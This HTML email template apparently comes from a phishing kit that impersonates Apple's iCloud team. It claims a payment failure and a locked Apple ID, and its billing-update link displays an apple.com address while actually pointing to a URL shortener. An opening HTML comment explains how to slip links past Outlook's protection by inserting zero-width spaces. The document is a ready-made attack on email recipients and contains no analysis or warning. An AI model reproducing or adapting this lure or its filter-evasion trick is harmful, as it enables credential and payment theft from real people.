<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
   "http://www.w3.org/TR/html4/loose.dtd">
<!-- HOW TO BYPASS OUTLOOK PROTECTION . 
(ZERO) for bypass unsecure link
ex : google.com 
echo : google.&#8203;com
choose ===> &#8203;
----> 
<html>
<head>
  <meta http-equiv="content-type" content="text/html; charset=UTF-8" />
  <meta name="viewport" content="width=685" />
  <title></title>
  <style TYPE="text/css">
  body {
   margin: 0 !important;
   padding: 0 !important;
  }

  a {
    text-decoration: none !important;
  }

  a:link {
    color: #08c !important;
	  text-decoration: none !important;
	}

	a:visited {
	  color: #08c !important;
	  text-decoration: none !important;
	}

	a:hover {
	  color: #08c !important;
	  text-decoration: underline !important;
	}

	a:active {
    color: #08c !important;
	  text-decoration: underline !important;
	}

  body.rtl {
    direction: rtl !important;
    text-align: right !important;
  }

  @media only screen and (min-device-width : 320px) and (max-device-width : 568px) {
    body[media-query-fix] {
      overflow: hidden;
      width: 320px !important;
      text-align: center !important;
      margin: 0;
      /**
        By default iOS minimum size is 13px.
        You can disable the min size by using -webkit-text-size-adjust:100%;
      **/
      -webkit-text-size-adjust:100% !important;
    }

    body[media-query-fix] .gutter {
     width: 24px !important;
   }

    body[media-query-fix] .centerColumn {
      width: 272px !important;
    }

    body[media-query-fix] .footer .bottomContent {
      padding-top: 15px !important;
      display: block !important;
    }

    body[media-query-fix] .footer.content {
      padding: 0px 10px !important;
    }

    body[media-query-fix] .footer .service {
      display: block !important;
    }

    body[media-query-fix] .apple_logo_top_spacer {
      height: 18px !important;
    }

    body[media-query-fix] .apple_logo_bottom_spacer {
      height: 8px !important;
    }

    body[media-query-fix] .table-cell-paragraph-spacer {
      padding-top: 13px !important;
    }

    body[media-query-fix] .table-cell-signature-spacer {
      padding-top: 29px !important;
    }

    body[media-query-fix] .table-cell-footnote-spacer {
      padding-top: 16px !important;
    }

    body[media-query-fix] .footerTopPadding {
      height: 25px !important;
    }

    body[media-query-fix] .fullColumn {
      width: 350px !important;
    }

    body[media-query-fix] .apple_logo {
      display: none !important;
    }

    body[media-query-fix] .apple_logo_td {
      background-image: url('http://r.mzstatic.com/email/cloud/apple_logo-2x.png') !important;
      background-repeat: no-repeat !important;
      background-position: right top !important;
      background-size: 17px 21px !important;
      height: 21px;
    }

    body[media-query-fix] .footer.background {
      background-image: url('http://r.mzstatic.com/email/cloud/footer_gradient-2x.png') !important;
      width: 272px !important;
      background-size: 320px 36px;
      background-repeat: no-repeat !important;
      background-position: center center !important;
    }

  }
  </style>
</head>
<body vlink="#08c" topmargin="0" marginheight="0" media-query-fix="fix" marginwidth="0" link="#08c" alink="#08c" bgcolor="#ffffff" leftmargin="0">
  
  <div vlink="#08c" link="#08c" alink="#08c" bgcolor="#ffffff" class="wrapper" style="padding:0; margin:0; background-color: #ffffff; font-family: 'HelveticaNeue-Light','Helvetica Neue', Arial, sans-serif; font-size: 15px; color: #333; font-weight: 300;">
  <TABLE class="fullColumn" style="width: 685px;" WIDTH="685" align="center" BORDER="0" CELLSPACING="0" CELLPADDING="0">
    <tr>
      <td class="apple_logo_top_spacer" colspan="3" style="height: 22px;" height="22"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
	  </tr>
    <tr>
      <td class="apple_logo_bottom_spacer" colspan="3" height="3" style="height: 3px;"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
      <!-- <td class="pepek3535" colspan="3" height="3"><img src="https://as-images.apple.com/is/image/AppleInc/aos/published/images/l/og/logo/applestore/logo-applestore-2013?wid=140&file.jpg" align="left"></td> -->
	  </tr>
    <tr>
		<td class="gutter" width="40" style="width: 40px;"></td>
    <td class="centerColumn" width="605">
			<table border="0" CELLSPACING="0" CELLPADDING="0" style="font-size: inherit; line-height: inherit; padding: 0px; border: 0px;">
			  <tr>
				  <td style="word-break: break-word; font-family: 'HelveticaNeue-Light','Helvetica Neue Light', Helvetica, Arial, sans-serif; color: #333; font-size: 15px; line-height: 20px; white-space: normal; font-weight: 300;">
					   Hello,
					</td>
				</tr>

      

      



       


       
       

           

           

           

           
               <tr>
                   <td class="table-cell-paragraph-spacer" style="word-break: break-word; font-family: 'HelveticaNeue-Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; color: #333; white-space: normal; font-weight: 300; padding-top: 18px; font-size: 15px; line-height: 20px;">On this time you are scheduled to be charged $10.99 for your 50GB iCloud storage plan, but there is a problem with your payment information <br>for security reason your Apple ID was temporary Locked</td>
               </tr>
               <tr>
                   <td class="table-cell-paragraph-spacer" style="word-break: break-word; font-family: 'HelveticaNeue-Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; color: #333; white-space: normal; font-weight: 300; padding-top: 18px; font-size: 15px; line-height: 20px;">Please update your payment information as soon as possible. If we cannot successfully charge your account, it will be downgraded to the free 5 GB plan and your service may be affected.</td>
               </tr>
           

           

       
       

        


              
              
                  <tr>
                      <td class="centerColumn" width="605">
                          <table BORDER="0" CELLSPACING="0" CELLPADDING="0">
                              <tr><td colspan="4" height="18"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td></tr>
                              <tr>
                                  <td colspan="4">
                                      <font size="2" color="#333333" face="HelveticaNeue-Light,Helvetica Neue Light, Helvetica, sans-serif" style="font-size:15px; line-height: 20px;white-space: normal; color: #333333; display: block; font-weight: 300;">
                                          Follow the instructions below to update your billing information:
                                      </font>
                                  </td>
                              </tr>
                              <tr><td colspan="4" height="18"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td></tr>
                              <tr>
                                  <td width="28"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
                                  <td nowrap="nowrap" valign="top"><font color="#333333" face="HelveticaNeue-Medium,Helvetica Neue Medium,Helvetica,sans-serif" size="2" style="font-size: 15px; line-height: 20px;font-weight: 500;">1.</font></td>
                                  <td width="10"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
                                  <td><font color="#333333" face="HelveticaNeue-Light,Helvetica Neue Light,Helvetica,sans-serif" size="2" style="font-size: 15px;line-height: 20px;white-space: normal; margin-top: 0px; display: block;font-weight: 300;">Go to web and login your Apple ID.</font></td>
                              </tr>

                              <tr><td colspan="4" height="1"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td></tr>

                              <tr>
                                  <td width="28"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
                                  <td nowrap="nowrap" valign="top"><font color="#333333" face="HelveticaNeue-Medium,Helvetica Neue Medium,Helvetica,sans-serif" size="2" style="font-size: 15px;line-height: 20px;font-weight: 500;">2.</font></td>
                                  <td width="10"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
                                  <td><font color="#333333" face="HelveticaNeue-Light,Helvetica Neue Light,Helvetica,sans-serif" size="2" style="font-size: 15px;line-height: 20px;white-space: normal; margin-top: 0px; display: block;font-weight:300;">Tap your name.</font></td>
                              </tr>

                              <tr><td colspan="4" height="1"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td></tr>

                              <tr>
                                  <td width="28"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
                                  <td nowrap="nowrap" valign="top"><font color="#333333" face="HelveticaNeue-Medium,Helvetica Neue Medium,Helvetica,sans-serif" size="2" style="font-size: 15px;line-height: 20px;font-weight:500;">3.</font></td>
                                  <td width="10"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td>
                                  <td><font color="#333333" face="HelveticaNeue-Light,Helvetica Neue Light,Helvetica,sans-serif" size="2" style="font-size: 15px;line-height: 20px;white-space: normal; margin-top: 0px; display: block;font-weight:300;">Tap Payment and follow the prompts.</font></td>
                              </tr>
                              <tr><td colspan="4" height="18"><img width="1" height="1" alt="" border="0" src="http://r.mzstatic.com/email/images_shared/spacer.gif" /></td></tr>
                              <tr>
                                  <td colspan="4">
                                      <font size="2" color="#333333" face="HelveticaNeue-Light,Helvetica Neue Light, Helvetica, sans-serif" style="font-size:15px; line-height: 20px;white-space: normal; color: #333333;font-weight: 300;">
                                          You can also update your billing information on a <a href="http://mby.me/vMM">https://billing.apple.com/icloud/update</a>.
                                          
                                      </font>
                                  </td>
                              </tr>
                          </table>
                      </td>
                  </tr>
              
              
                  <tr>
                      <td class="table-cell-signature-spacer" style="word-break: break-word; font-family: 'HelveticaNeue-Light', 'Helvetica Neue', Helvetica, Arial, sans-serif; color: #333; white-space: normal; font-weight: 300; padding-top: 34px; font-size: 15px; line-height: 20px;">The iCloud Team</td>
                  </tr>
              



        </table>
    </td>
		<td class="gutter" width="40" style="width: 40px;"></td>
    </tr>


  </TABLE>

  
  <table class="centerColumn" WIDTH="685" ALIGN="center" BORDER="0" CELLSPACING="0" CELLPADDING="0">
    <tr class="footerTopPadding" style="height: 33px;" height="33">
      <td style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;"></td>
    </tr>
    <tr>
      
      <td class="footer background centerColumn" align="center" valign="middle" background='http://r.mzstatic.com/email/cloud/footer_gradient_web.png' style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; width: 685px; font-size: 11px; line-height: 14px; color: #888; background-repeat: no-repeat; background-position: center top; padding: 19px 0 13px;" align="center">
        <img class="icloud-logo" src='http://r.mzstatic.com/email/cloud/icloud-logo-icon-2x.png' style="display: inline-block; width: 81px; height: 22px;" width="115" height="32" alt="" border="0">
      </td>
      
      
    </tr>
    <tr>
      <td class="footer centerColumn content" style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; width: 685px; font-size: 11px; line-height: 14px; color: #888;" align="center">
        <span class="service">iCloud is a service provided by Apple.</span>
        <span class="footer1" style="white-space: nowrap;"><a style="color: #08c; text-decoration: none;" href="#">Apple ID</a></span>
        |
        <span class="footer1" style="white-space: nowrap;"><a style="color: #08c; text-decoration: none;" href="#">iCloud Support</a></span>
        |
        <span class="footer1" style="white-space: nowrap;"><a style="color: #08c; text-decoration: none;" href="#">Terms and Conditions</a></span>
        |
        <span class="footer1" style="white-space: nowrap;"><a style="color: #08c; text-decoration: none;" href="#">Privacy Policy</a></span>
        
        <br />
        <span class="bottomContent">
          <span class="footer1" style="white-space: nowrap;">Copyright &copy; 2019</span>
          <span>Apple Inc.
           <span class="nobr" style="white-space: nowrap;"><a href="#address" id="address" style="color: #888888 !important; text-decoration: none; cursor: text;">1 Apple Park Way, Cupertino, CA 95014, United States.</a></span></span>
          <span class="footer1" style="white-space: nowrap;">All rights reserved.</span>
        </span>
        
      </td>
    </tr>
    <tr class="footerBottomPadding" style="height: 50px;" height="50"><td style="font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif;"></td></tr>
  </table>
  

  </div>
</body>

<img src='http://outsideapple.apple.com/img/APPLE_EMAIL_LINK/spacer4.gif'/>
</html>